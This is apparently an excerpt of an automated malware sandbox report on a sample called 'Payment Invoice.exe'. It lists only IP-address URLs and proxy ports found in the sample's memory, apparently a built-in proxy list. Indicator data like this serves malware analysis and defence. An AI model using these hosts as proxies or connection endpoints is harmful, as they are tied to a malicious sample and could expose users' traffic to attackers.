                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.146://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.146:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.182
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.182://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.182:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.198
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.198://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.198:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.207
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.207://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.207:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.154
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.154://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.154:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.234
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.234://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.234:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.65
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.65://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.65:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.149://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.42
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.42://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.42:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.109.143
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.109.143://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.109.143:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.109.207
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.109.207://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.109.207:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.109.213
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.109.213://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318253000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.109.213:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631730D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.143.127
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317235000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.143.127://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.143.127:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.213.202
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.213.202://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.213.202:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.221.57
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.221.57://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.221.57:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.224.33
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.224.33://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.224.33:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.226.6
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.226.6://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.226.6:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.241.204
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.241.204://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.241.204:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.72.45://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.72.45:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.81.76
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.81.76://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.81.76:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.132.79
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.132.79://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.132.79:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.166.210
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.166.210://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.166.210:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.171.235
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.171.235://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.171.235:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.210.9
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631841E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.210.9://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.210.9:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.215.222:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.50.45
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.50.45://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.50.45:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.84.150
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.84.150://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.84.150:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.9.114
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.9.114://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.17.9.114:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.103.125
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163195FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.103.125://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631967C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.103.125:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.136.28
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.136.28://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.136.28:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.161.122
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.161.122://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.161.122:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.20.160
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.20.160://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.20.160:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.220.95:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.234.218:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.237.128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.237.128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.237.128:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.18.251.208:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.138.4
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.138.4://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.138.4:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.225.70
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.225.70://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.225.70:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.235.10
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.235.10://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.235.10:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.247.62
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.247.62://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.247.62:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.5.247
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.5.247://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.5.247:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.79.238:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.85.214
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.85.214://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.19.85.214:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.192.202.11:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.192.202.11:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.103.68
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.103.68://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.103.68:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.123.164
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.123.164://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.123.164:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.198.49
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.198.49://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.198.49:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.233.70
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.233.70://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.233.70:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317253000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.24.214
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.24.214://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317272000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.24.214:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.34.100
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.34.100://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.34.100:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.56.71
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.56.71://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.56.71:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.75.31://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.75.31:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.89.77
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.89.77://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.20.89.77:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163195EC000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.200.135.46:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163195EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.200.135.46:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.200.152.30:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.200.152.30:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.102.95
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.102.95://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.102.95:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.194.182
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631735E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.194.182://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.194.182:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.223.181
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.223.181://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.223.181:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.31.189
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.31.189://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.31.189:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.6.88
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.6.88://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.6.88:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.64.208:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.66.184
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.66.184://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.66.184:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.85.109:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.85.200$
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.85.200://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.21.85.200:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.22.37.236:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.22.50.220
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.22.50.220://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.22.50.220:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.225.220.233
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.225.220.233://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.225.220.233:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.23.125.117:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.23.128.174
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.23.128.174://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.23.128.174:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.23.141.196:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:23667://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:26305
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:26305://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:26305h
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:30026
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.238.111.107:30026://proxy
